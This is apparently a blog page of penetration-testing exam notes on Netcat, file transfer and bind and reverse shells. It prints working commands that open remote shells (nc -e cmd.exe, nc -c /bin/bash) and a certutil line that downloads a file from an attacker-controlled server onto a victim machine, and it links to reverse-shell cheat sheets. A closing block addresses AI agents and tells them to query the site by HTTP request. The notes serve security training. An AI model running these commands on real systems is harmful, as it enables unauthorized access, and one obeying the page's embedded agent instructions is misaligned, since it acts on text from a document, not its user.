# Bind & Reverse Shells

## Netcat Fundamentals

* Netcat (Aka TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP.
* Netcat is available for both \*NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements.
* Netcat utilizes a client-server communication architecture with two modes:
  * Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server).
  * Server mode - Netcat can be used to listen for connections from clients on a specific port.
* Netcat can be used by penetration testers to perform the following functionality:
  * Banner Grabbing
  * Port Scanning
  * Transferring Files
  * Bind/Reverse Shells \</aside>

## **Usage of Netcat**

The `/usr/share/windows-binaries` folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation.&#x20;

### Transferring Files from Kali Linux to Windows

#### **Using Python HTTP Server and Certutil**

1. **Prepare Files:**
   * Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux.
2. **Host File on Python Server:**
   * Start a Python HTTP server:

     ```bash
     python3 -m http.server
     ```
   * Files can now be accessed via `http://<your_ip>:8000/<filename>`.
3. **Download on Windows Using Certutil:**
   * On the victim's Windows machine:

     ```bash
     certutil -urlcache -f http://<your_ip>:8000/<filename> <file_name_to_save>
     ```

#### **Using Netcat (nc) for Direct Transfer**

1. **Setup Netcat on Windows:**
   * Receive files using Netcat:

     ```bash
     nc.exe -nvlp 1234 > <output-file-name>
     ```
2. **Send File from Kali Linux:**
   * Send file from Kali Linux to Windows:

     ```bash
     nc -nv <win_ip> 1234 < <file-to-share>
     ```
   * Replace `<win_ip>` with the Windows machine's IP address.

## Bind Shells

* A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system.
* A Netcat listener can be setup to execute a specific executable like cmd.exe or /bin/bash when a client connects to the listener.

<figure><img src="/files/Dww4ZvR5wWv3KVLkurmz" alt=""><figcaption><p>Bind Shells</p></figcaption></figure>

## Setting Up Bind Shells

### **Windows System**

* **Establish Bind Shell:**

  ```bash
  nc.exe -nvlp 1234 -e cmd.exe
  ```

  This command starts a Netcat listener (`-l`) on port 1234 (`-p 1234`) and executes (`-e`) `cmd.exe` upon connection, creating a bind shell.
* **Connect from Linux:**

  ```bash
  nc -nv <win_ip> <port>
  ```

  Replace `<win_ip>` with the IP address of the Windows machine hosting the bind shell, and `<port>` with the port number (1234 in this example).

### **Linux System**

* **Establish Bind Shell:**

  ```bash
  nc -nvlp 1234 -c /bin/bash
  ```

  This command sets up a Netcat listener (`-l`) on port 1234 (`-p 1234`) and executes (`-c`) `/bin/bash` upon connection, creating a bind shell.
* **Connect from Windows:**

  ```bash
  nc.exe -nv <linux_ip> <port>
  ```

  Replace `<linux_ip>` with the IP address of the Linux machine hosting the bind shell, and `<port>` with the port number (1234 in this example).

## Reverse Shells

* A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

<figure><img src="/files/OswJ6orZCTPSndJFXC2F" alt=""><figcaption><p>Reverse Shells</p></figcaption></figure>

### Reverse Shell Cheatsheet

* [Reverse Shell Generator](https://www.revshells.com/)
* [Reverse Shell Cheatsheet - PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

***

***

***

**`Hacker's Mantra:`**` ``Humiliation is the favorite currency of the hacker. - Sherlock Holmes`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/exploitation/bind-and-reverse-shells.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.